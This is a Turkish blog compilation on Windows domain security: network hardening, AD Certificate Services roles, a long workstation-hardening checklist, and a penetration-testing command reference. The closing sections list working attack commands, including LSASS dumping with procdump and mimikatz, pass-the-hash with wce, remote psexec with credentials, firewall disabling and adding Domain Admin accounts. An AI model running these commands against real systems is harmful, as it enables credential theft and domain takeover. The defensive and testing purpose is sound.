Etki Alanı Saldırılarından Korunma Yolları: Ağ Yapılandırması

Etki Alanı Saldırılarından Korunma Yolları: Ağ Yapılandırması

Etki alanına karşı yapılan saldırılar ve sızma testleri sırasında, bulunulan ağda IP ve port taraması gerçekleştirilmekte ve böylece ortamda çalışan servisler hakkında bilgi sahibi olunabilmektedir. Bu bilgileri kullanılarak ilgili sistemlere saldırılar gerçekleştirilebilmektedir. Bunun yanında sızılan ağda zafiyet taraması gerçekleştirilmekte ve zafiyete özel saldırılar düzenlenmektedir.
Ağ taramalarının etkin olarak gerçekleştirilememesi için, ağ taraması sonucunda olabildiğince az bilginin açığa çıkarılması sağlanmalıdır.  Bu amaçla ağ ayarları sıkılaştırılmalı ve yapılandırılmalıdır.
Ağ ayarlarının yapılandırılması için, en az aşağıdaki ayarların uygulanması gerekmektedir.

• Etki alanındaki bilgisayarlara erişimler ortamdaki aktif cihazlarla kontrol edilmelidir. Sadece gerekli olan IP veya IP bloklarından erişimler sağlanabilmelidir. Ayrıca port kontrolü de gerçekleştirilmelidir. Özellikle kritik konumdaki sunuculara olan ağ bağlantıları için erişimler kontrollü olarak verilmelidir. Kurumdaki ağ mimarisinin güvenilir bir şekilde yapılandırılması konusu ile ilgili bir yazı dizisi Bilgi Güvenliği Kapısı'nda yayınlanmıştır: https://www.bilgiguvenligi.gov.tr/ag-guvenligi/guvenli-ag-mimarisi-tasarimi-1.html ve https://www.bilgiguvenligi.gov.tr/ag-guvenligi/guvenli-ag-mimarisi-tasarimi-2.html . 
• Ağ yapılandırmasının yanında ortamda gerçekleştirilen tarama işlemlerinden haberdar olunabilmesi için anormal ağ trafiğinin tespiti ve önlenmesine yönelik gerekli çözümler kullanılmalıdır.
• Bilgisayarlarda gereksiz olan tüm servisler kapatılmalıdır. Böylece saldırı yüzeyi azaltılır. Servis güvenliği için servisi çalıştıran kullanıcılar kontrol edilmelidir, varsayılan dışında oluşturulan servis hesaplarının parolalarının karmaşık ve uzun olması sağlanmalıdır. Bunun yanında erişilebilirliği sürdürebilmek için parolalar kilitlenmeyecek şekilde ayarlanmalı, periyodik olarak değiştirilmelidir.
• Sızılan bir bilgisayarlar üzerinden diğer bilgisayarlara yayılma için en çok yönetimsel paylaşımlar kullanılmaktadır. Bunu önlemek için, yönetimsel paylaşımlar kullanılmaktadır. Bu sebeple yönetimsel paylaşımların kapatılması gerekmektedir. Eğer etki alanındaki yönetimsel operasyonlar için yönetimsel paylaşımlar gerekli ise, sadece bu operasyonları gerçekleştirecek olan özel kullanıcılar için yönetimsel paylaşımlarda işlem gerçekleştirme hakkı verilmesi gerekmektedir. Bu amaçla aşağıda belirtilen anahtar değerleri 0 olarak ayarlanmalıdır.
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\AutoShareServer
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\AutoShareWks
• Paylaşımların kapatılamayacağı durumlarda paylaşımlara erişimler kısıtlanmalıdır. Belirli IP'ler üzerinden ve belirli kullanıcılar için paylaşımlara erişimler izin verilmelidir.
• Paylaşımlarda sistemlere ait yedekleme dosyaları bulunmamalıdır. Bulunması gerekiyorsa, bu dosyalar şifreli saklanmalıdır.
• Bilgisayarlardaki TCP/IP güvenliğine önem verilmelidir. Bu amaçla internet seçeneklerinden ayarlar yapılabileceği gibi, kayıt defterinde de gerekli ayarlar gerçekleştirilmelidir.

AD-CS: Rol Servisleri

Aktif Dizin Sertifika Servisi: Rol Servisleri

Windows Server 2008 R2 üzerinde AD Sertifika Hizmeti’nin 6 bileşeni bulunmaktadır. Bu bileşenler şu şekildedir:

• Sertifika Otoritesi (Certification Authority) : Temel rol servisidir. Kök ve Alt CA sunucuları; etki alanındaki veya dışında bulunan kullanıcı, bilgisayar veya servislere sertifika verilmesi ve bu sertifikaların geçerliliğinin yönetilmesi işlemlerini gerçekleştirir.
• CA Web Kaydı (Certification Authority Web Enrollment): Kullanıcıların sertifika talep etmek, yenilemek, Sertifika iptal listesine (Certificate Revocation List – CRL) erişmek, akıllı kart sertifikalarının dağıtmak için basitleştirilmiş bir web ara yüzü sunmaktadır. Bu arayüze “http://SunucuAdi/certsrv” adresinden erişilebilir.
• Çevrimiçi Yanıtlama Hizmeti (Online Responder Service): Belirli sertifikaların iptal edilme durum bilgisi isteklerini alır, bu sertifikaların durumunu analiz eder ve istenen sertifika durum bilgilerini içeren imzalı bir yanıtı geri gönderir. Bu servis Online Certificate Service Protokol’ünü (OCSP) çalıştırır. Bu servis, kompleks yapılar içinde, Certificate Revocation List (CRL) kontrolünü daha rahat erişilebilir kılmaktadır. CRL girdileri, istekte bulunan kişiye tüm CRL yerine, geçerliliğini öğrenmek istediği sertifikanın geçerlilik durumunu imzalı olarak yollar. Bu sayede istemci, sertifika doğrulamak istediğinde hem harcanan toplam ağ trafiği büyük oranda düşmüş olur, hem de daha hızlı cevap alır. http://technet.microsoft.com/tr-tr/library/cc770413(v=ws.10).aspx
• Ağ Aygıtları Kayıt Servisi (Network Device Enrollment Service): Etki alanı hesabı olmayan yönlendiricilerin ve diğer ağ aygıtlarının, Simple Certificate Enrollment Protocol (SCEP) kullanarak sertifika almasına olanak sağlar. http://technet.microsoft.com/tr-tr/library/cc753784(v=ws.10).aspx
• Sertifika Kaydı Web Hizmeti (Certificate Enrollment Web Service): Kullanıcıların ya da bilgisayarların, bilgisayarlar etki alanı üyesi olmasa bile ya da etki alanı ağında olmasa bile, HTTPS protokolünü kullanarak sertifika kaydı gerçekleştirmelerini sağlar. Bu hizmet; gelen talepleri HTTPS trafiği üzerinden alır, talebi asıl yapan istemci adına DCOM protokolünü kullanarak CA’ya bağlanır ve sertifika kayıt işlemini tamamlar, daha sonra sertifika cevabını yine HTTPS üzerinden geri gönderir.
• Sertifika Kaydı İlkesi Web Hizmeti (Certificate Enrollment Policy Web Service): Kullanıcıların ve bilgisayarların sertifika kaydı ilkesi bilgilerini almalarını sağlar. Bu hizmet; ağdaki istemci bilgisayarlara sertifika ilkesini iletmek için HTTPS protokolünü kullanır. LDAP kullanarak AD-DS’ten sertifika ilke bilgisini alır, bu bilgiyi ön belleğinde saklar ve istemciye sunar. Bu hizmet, bir önce belirtilen rol servisi (Sertifika Kaydı Web Hizmeti) ile otaklaşa çalışır. Bu iki hizmet, istemci bilgisayar etki alanının bir üyesi olmadığında veya bir etki alanının bulunduğu ağa bağlı olmadığında da ilke tabanlı sertifika kaydı sağlar. Bu sayede orman (forest) sınırları dışarısında gereksiz yere CA kurulmasının önüne geçilebilmekte, organizasyon dışındaki iş ortakları ve hareketli (mobil) çalışanlara sertifika düzenlenebilmektedir.

İpucu: Bilgisayarı Güvenli Kullanma Yöntemleri

Bilgisayarı Güvenli Kullanma Yöntemleri

1. Belli aralıklarla bilgisayarınızın veya önemli dosyalarınızın yedeğini (başka bir yerde) alınız.
2. Uzaktan erişimi (RDP) kapatınız. Bir makineye bağlantı kurulurken, disk paylaşımı gerçekleştirilmemelidir. Kullanılacaksa da en son bağlantı kurulan hedefler saklanmamalıdır. (Parolalar hiç saklanmamalıdır.)
3. Uzaktan çalışan servisler reddedilmelidir. (Domain'de olan bilgisayarlar için), kullanıcıların hesaplarına ait kendi bilgisayarınızda job/servis/batch varsa bunlar olabildiğince temizlenmelidir. "Log on as a batch job", "Log on as a service" etkin olmamalıdır.
4. Remote Assistance kullanılmamalıdır.
5. Network üzerinden makineye erişimi sadece Administrators gerçekleştirebilmelidir. Herkes erişememelidir.Remote Desktop Users'ta, Power Users'ta, Administrators'ta gereksiz kimse olmamalı. "remoteadmin ", "remoteadmin " gibi servisler disable edilebilir. "Access this computer from the network", "Allow log on through Remote Desktop Services" kimsede olmamalı. "Deny access to this computer from the network" için Guests olmalıdır. PSEXEC ile bir başkası bilgisayara bağlanamamalıdır.
6. Disk NTFS ile formatlanmalıdır.
7. İşletim sistemi hakları kimsede olmamalıdır."Act as part of the operating system" kimsede olmamalıdır.
8. Grup ilkelerindeki özellikle "User Rights" çok çok sıkı olmalı. Önemli bile görülmeyebilecek olan "Change the system time" adli Bilişim için önemli olabilir. Bunun yanında "Create a token object", "Debug programs", "Enable computer and user accounts to be trusted for delegation", "Impersonate a client after authentication", "Profile single process", "Replace a process level token", "Allow log on locally", "Increase a process working set", "Take ownership of files or other objects", "Access Credential Manager as a trusted caller" ilkeleri üzerinde iyi durulmalı.
9. IE site ayarlarından; Trusted Sites için en az Medium, Restricted Sites için High olacak şekilde ayarlanmalıdır. Trusted Sites listesinde çok güvenilen siteler eklenmelidir.
10. IE üzerinde mobil kodlar(ActiveX, Javascript kodları) kapatılmalıdır veya kullanıcı onayına sunulmalıdır.
11. İnternette dolaşırken cookie saklanmamalı, kullanılan parolaların hatırlanmaması sağlanmalı, otomatik tamamlama özelliği kapatılmalı, geçmiş kaydedilmemelidir.
12. IE kullanırken Status Bar açık olmalıdır. Böylece kullanıcı tıkladığı yer ile gittiği yerin aynı olduğundan emin olur. (<a href ="www.XYZ.com"> www.KLM.com<\a> gibi bir durumda yardımcı olabilir. Kullanıcı gideceği adresi incelemelidir.)
13. Gereksiz eklentiler kaldırılmalıdır.
14. DNS olarak güvenilir olmayan sunucular kullanılmamalıdır.
15. Host dosyasında(C:\Windows\System32\drivers\etc\hosts) herhangi bir kayıt eklenmiş olmamalıdır.
16. İnternette dolaşırken veya mailler okunurken her site tıklanmamalıdır, Tıklanılan hedef ile erişilen hedefin aynı olup olmadığı kontrol edilmelidir, her dosya indirilmemelidir. Dosyaların otomatik indirilmemesi, kullanıcıya sordurulması için gerekli ayarlamalar yapılmalıdır.
17. Mailleşme, anlık görüşme için PGP/SSL kullanılmalıdır.
18. İnternet kullanılmayacaksa Ethernet kablosu çekilmelidir veya Wireless kapatılmalıdır. Modem kapatılmalıdır.
19. Public ortamda wireless kullanılmamalıdır. Ayrıca Wireless ve bluetooth kullanılmadığı zamanlar kapalı olmalı, sormadan otomatik olarak şifresiz veya şifreli ağlara bağlanmaması için gerekli ayarlar yapılamalıdır. Wireless parolası saklanmamalıdır.
20. Kullanılan modemde SSID gizlenmeli, özelleştirilmeli, kompleks parola kullanılmalıdır.
21. Makineye güvenilmeyen sertifika yüklenmemelidir.
22. HTTPS bağlantılarda güvenilir olmayan sitelere giriş yapılmamalıdır. Bu siteler için istisnai durum eklenmemelidir.
23. HTTPS bağlantılı sitelerde yeşil ikon çıkması beklenmelidir.
24. Klasör seçeneklerinden gizli dosyaları göster seçeneği işaretlenmelidir. 
25. Klasör seçeneklerinden bilinen dosya uzantılarını gizle seçeneği işaretlenmemelidir. Her dosyaya ait uzantının izlenebilmesi sağlanmalıdır.
26. Makinelere BIOS parolası konulmalıdır. BIOS ayarlarının değiştirilmesi için de parola sorgusu ayarlanmalıdır.
27. Gereksiz yerel kullanıcılar silinmelidir. Administrator ve Guest hesabı etkin olmamalıdır. Administrator parolası ve kullanıcı adı değiştirilmelidir. Guest hesabının adı değiştirilmelidir.
28. Yerel kullanıcıların hakları gözden geçirilmelidir. Gereksiz olan yetkiler kullanıcılarda alınmalıdır.
29. Kullanılan makinelerde yönetici hakları ile oturum açılmamalıdır. Sadece yönetici hakları ile gereken işlemler için yönetici hesabı kullanılmalıdır. En fazla 2 tane yönetici haklarına sahip kullanıcı olmalıdır.
30. Admin hesabı ile çalışan zamanlanmış görevler, prosesler, servisler gözden geçirilmelidir. Gereksiz olanlar iptal edilmelidir.
31. Kullanılan parola en az 8 karakter olmalıdır. (14 karakterden uzun olması tavsiye edilir)
32. Kullanılan parola karmaşık düzeyde olmalıdır. Parola; büyük harf, küçük harf, rakam, noktalama işareti ve ayrıca ALT- ile kombinasyon oluşturan bir karakter içermelidir.
33. Kullanılan parola 3 kere yanlış girilirse hesap 15 dakika boyunca kilitli kalsın.
34. Kullanılan parola sık sık değiştirilmelidir. Kullanılan bir parola daha önceki parolalardan tahmin edilememelidir.
35. Makinede kullanılan parola, internette kullanılan parola ile aynı ve benzer olmamalıdır. Bilgisayar parolası tahmin edilememelidir.
36. MS SQL için, CmdExec rolü kapalı olmalıdır.
37. Makinede audit log alınması sağlanmalıdır. Success & failure log alınması sağlanmalıdır.
38. Riskli işlemler yapılırken sanal makine kullanılmalıdır.
39. Güvenilir olmayan USB/CD gibi taşınabilir ürünleri makineye takılmamalıdır.
40. Güvenilir olmayan uygulamalar, crackli uygulamalar makinelere yüklenmemelidir.
41. Makinede belli aralıklarla zafiyet taraması gerçekleştirilmelidir.
42. CIS'in kontrol listesi ile belli aralıklarda denetim gerçekleştirilmelidir.
43. Dosya paylaşımları kapatılmalıdır. Gerekli ise, sadece belli kullanıcılara Okuma yetkisi verilmelidir.
44. Yazıcı paylaşımı kaldırılmalıdır.
45. LANMAN özetinin tutulması önlenmelidir. Sadece NTLMv2 ile iletişim kabul edilmelidir, diğerleri reddedilmelidir. 
46. Makinede sistemlere bağlantı için kullanılan biletler saklanmamalıdır. Saklanacaksa da yenilenme süresi kısa tutulmalı, en fazla son 5 bilet saklanmalıdır.
47. Makinenin çalınma ihtimaline karşı fiziksel kilit koyulmalıdır. Ayrıca izleyici de koyulmalıdır.
48. Harddiskler tamamen şifrelenmelidir.
49. Windows güvenlik duvarı açık olmalıdır. Güvenlik duvarındaki istisnai durumlar gözden geçirilmelidir, gereksiz istisnalar silinmelidir. Güvenlik duvarına ait başarılı ve başarısız loglar alınmalıdır.
50. Kullanıcıların güvenlik duvarına istisna eklemesi için, uyarı verilmesi önlenilmelidir. Aksi halde kullanıcının dalgınlığı ile istisnai durum eklenebilir. 
51. Windows Update açık olmalıdır. İşletim sistemi otomatik olarak güncellenebilmelidir. Güncelleme sırasında kullanıcı haberdar edilmelidir.
52. Makinede yüklü programlar güncellenmelidir.
53. Antivirüs, Antispyware, Antiphishing gibi uygulamalar yüklü, güncel, orijinal (cracksiz), paralı olmalıdır. Belli aralıklarla taramalar gerçekleştirilmelidir. Mümkünse farklı ürünlerle de tarama gerçekleştirilmelidir.
54. Gereksiz programlar kaldırılmalıdır, portlar ve servisler kapatılmalıdır. Kurulan programlar güvenlik için gerekli konfigürasyon ayarları yapılmalıdır.
55. Bilgisayar ilk açıldığında çalışan programlar (startup) olabildiğince azaltılmalıdır.
56. CD/USB kullanımında otomatik çalışmanın önlenmesi için Auto Run kapatılmalıdır.
57. Ekran koruyucu kullanılmalıdır. Ekran korucu çıktıktan sonra parola sorgulaması yapılmalıdır.
58. Makinelerde gizli veriler saklanırken şifrelenmelidir. Bunun için Keepass Portable gibi bir parola saklama uygulaması, Şifreleri Excelde saklayıp bu Excel'i şifreleme vs kullanılabilir.
59. Makinelerde Process Explorer tarzı bir uygulama yüklü olmalı. Şüphelenilen prosesler incelenmelidir.
60. net, dsquery, taskslist, reg, gpresult, systeminfo,... gibi makineden bilgi alınabilecek komutların çalıştırılmalısı önlenmelidir. Mümkünse CMD kapatılmalıdır. Herhangi birisinin SID bilgilerini ele geçirmesi önlenmelidir.
61. Makinede ilk oturum açılırken en son hangi kullanıcının oturum açtığı bilgisi saklanmamalıdır.
62. Smart kart okuyucusu çıkarıldığında makine kilitlenmelidir.
63. Eğer hangi vakitlerde bilgisayarın açılacağı belli ise, oturum açma takvimi oluşturulmalıdır. Saat 17.00'den sonra kullanıcı oturum açamasın gibi.
64. Makine ping'e ve broadcast'e kapatılmalıdır.
65. Uygulamaların desteği varsa parolalı olarak kullanılmalıdır. Örneğin mail yollarken kullanıcı adı/parola bilgileri sorgulansın.
66. Kullanıcılar, oturumlarını açarken CTRL-ALT-DEL tuş takımının kullanmaya zorlanmalıdır. Bu işlem, Run kısmına "netplwiz" veya "Control Userpasswords2" yazılması ile gelen panelde gerçekleştirilir.
67. "Ease of access" özelliği kaldırılmalıdır.
68. PCMCIA, firewire gibi gereksiz fiziksel donanımlar disable edilmeli, kullanılmamalıdır.
69. Domain ortamında Cached authentication kapatılmalıdır. (Mobil kullanıcılar hariç tutulabilir) 
70. Bilgisayarda debug mod (kernel mode) etkinliği kontrol edilmelidir.
71. TCP/IP & Ağ ayarları güvenilir hale getirilmelidir.

Etki Alanı Sızma Testlerinde Kullanılabilecek Komutlar

Etki Alanı Sızma Testlerinde Kullanılabilecek Komutlar

Oturumunda Olunan Kullanıcının Adı
whoami
echo %computername%\%username%

Kullanıcıya Ait Tüm Bilgiler
whoami /all

Açık portlar
netstat -ano -p TCP

Açık portlar (Saniyede bir güncellenir)
netstat -ano 1

Açık portu kullanan uygulama
netstat -abf
Örnek: TCP 192.168.0.97:2854 193.140.13.200:imaps ESTABLISHED [OUTLOOK.EXE]

RDP ile bağlanılan makineler
netstat -ano | findstr 3389 | findstr /v 0.0.0.0:3389

Zamanlanmış görevler
schtasks /query /fo LIST /v | findstr "Folder: HostName: Author: Run: TaskName: Comment:"

Zamanlanmış görev oluşturma
at \\192.168.32.62 15:00 "cmd.exe"

Çalışan servislerin listelenmesi
sc query
sc queryex            (PID değeri de içerir)

Bir servisi kapatma
net stop PolicyAgent

Servisleri Listeleme
wmic service get name, displayname, started | findstr /C:Term

Remote Desktop'u etkinleştirmek
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set service remotedesktop enable

Remote Assistant'ı etkinleştirmek
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

Başka bir kullanıcı gibi komut satırını çalıştırma
runas /env /user:FENER\alex cmd

Bir servisi disable etme
sc config PlugPlay start= disabled
(Power, PlugPlay gibi kapatılamayan servisler devre dış bırakılıp, makine yeniden başlatılırsa bu servis çalışmaz.)
net stop TermService

Çalışan prosesleri servisine göre listeleme ve filtreleme
tasklist SVC | findstr /I "msseces.exe"

Çalışan proseslerin detayları
wmic process where (executablepath like "%system32%" and name!="svchost.exe" or Priority = "8" ) get HandleCount, Name, ParentProcessId, Priority, ProcessId, ThreadCount /Every:3 >  C:\Users\DenemeKullanici\Desktop\Sonuc.txt

Çalışan prosesi öldürme
taskkill /F /T /IM filezillaftp.exe

Uzaktaki Bilgisayarın Sistemi
psinfo \\172.16.4.230 -h -s -d

SYSTEM kullanıcı hakkını elde etme
PSEXEC -s cmd.exe

Uzaktaki Bilgisayarın Komut Satırına Geçmek
psexec \\172.16.4.230 -u FENER\alex -p 1907?Fenerbahce cmd.exe -i 0

Uzaktaki Bilgisayarda çalışan prosesler
tasklist /V /S 172.16.72.129 /U FENER\alex /P 1907?Fenerbahce

Makinede Açık Olan Tüm Oturumlar
query session
qwinsta

Oturumu açık kullanıcıları elde etme
query session /server:MSGE-PC

3 nolu oturumu düşürme
reset session 3 /server:MSGE-PC

Grup İlkesinin Güncellenmesi
gpupdate /force

Grup İlkesi
gpresult /z
gpresult /H C:\Users\UygulananIlke.html

Denetim Kurallarını elde etme
auditpol /get /category:*

Bir Registry kaydını elde etme
reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail

Bir Audit kaydını düzenleme
auditpol /set /subcategory:"IPsec Driver" /success:enable /failure:disable

Belli isimdeki bir dosyanın / klasörün aranması
dir H:/Muziklerim /s /b | findstr Sezen > liste.txt
tree H:/Muziklerim /F  | findstr Sezen > liste.txt

Parola politikası
net accounts
net accounts /uniquepw:5

Güvenlik duvarını aktifliğini kontrol etme
netsh firewall show opmode
netsh advfirewall show allprofiles

Güvenlik duvarını etkinsizleştirme
netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=DISABLE
netsh advfirewall set currentprofile state off

Düşürülen paketleri loglama
netsh firewall set logging droppedpackets = enable
netsh firewall set logging connections = enable
Logların düştüğü dizin:          %systemroot%\System32\LogFiles\Firewall\pfirewall.log

Kayıtlı kritik bilgileri elde etme
Get-ChildItem -Path C:\docs, C:\inetpub, C:\PerfLogs, C:\ProgramData, C:\Users -Include *.txt,  *.log, *.bat, *.reg, *.cs, *.sql, *.ps1, *.config, *.properties  -Recurse | Select-String -Pattern Password, password, Sifre, sifre, Parola, parola, Şifre, şifre, root, admin -casesensitive > C:\Windows\_Arama.txt
Uzantılar: txt, log, bat, reg, cs, sql, ps1, config, properties , ora, xml, java, doc, docx, pdf, xls, xlsx, csv, html, xhtml, htm, cmd, php, py, rb, sh, vbs, c, cfg, mhtml, asp, aspx, jsp, pl, eml, ini, inf
Kaynak: http://en.wikipedia.org/wiki/List_of_file_formats

Kullanıcı & Grup işlemleri
net user --> Tüm yerel kullanıcılar listelenir.
net user YeniKullanici --> Belli bir yerel kullanıcının özellikleri listelenir.
net user YeniKullanici Deneme123. /add
net localgroup
net localgroup "Remote Desktop Users"
net localgroup Administrators YeniKullanici /add
net user /domain
net user YeniHesap /domain
net user YeniHesap Deneme123. /domain /add
net group /domain
net group "Domain Admins" /domain
net group "Domain Admins" YeniHesap /domain /add

Bilgisayar işlemleri
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
Get-ADComputer -Filter { OperatingSystem -Like '*XP*' } -Properties OperatingSystem | Format-Table Name, OperatingSystem -Wrap -Auto

Bağlı Olunan Domain Controller
echo %LOGONSERVER%
systeminfo | findstr "Domain:"

Windows Güven İlişkileri
nltest /domain_trusts --> Tüm güven ilişkilerini listeler
nltest /dcname:Sirket --> Belli bir domaindeki PDC sunucusunu sorgular.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains --> Forest içerisindeki tüm domain'ler listelenir.
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() --> Mevcut domain için tüm güven ilişkileri (Parent-Child, 2 yönlü vs) listelenir.


Saldırı amaçlı komutlar
net use \\<Win_IP>\C$ /user:<WORKGROUP>\Tubitak  Aa123456
psexec \\<Win_IP> -u WORKGROUP\tubitak -p Aa123456 cmd.exe
mimikatz > privilege::debug > sekurlsa::logonPasswords
wce -s WORKGROUP:Administrator:<LM>:<NTLM>

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonPasswords

net time \\<Win_IP>
at \\<Win_IP> 10:32 C:\Yeni_Klasor\Procdump_Betik.bat

@echo off

C:\Yeni_Klasor\procdump.exe -accepteula -ma lsass.exe C:\Yeni_Klasor\Hedef_LSASS.dmp

Kaynaklar:
http://ertugrulbasaranoglu.blogspot.com.tr/2012/10/domainden-elde-edilebilecek-baz-onemli.html
http://rajhackingarticles.blogspot.com.tr/2014/07/hack-all-security-features-in-remote.html
http://www.networkpentest.net/p/windows-command-list.html
http://www.harmj0y.net/blog/redteaming/trusts-you-might-have-missed/
http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/
https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US#

Komut Satırı: Network Komutları

Network İle İlgili Komutlar

22. porttan RDP servisinin çalıştırılması
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x16 /f

443. porttan gelen talepleri dinleme
tcpdump -nnvi eth0 proto TCP and port 443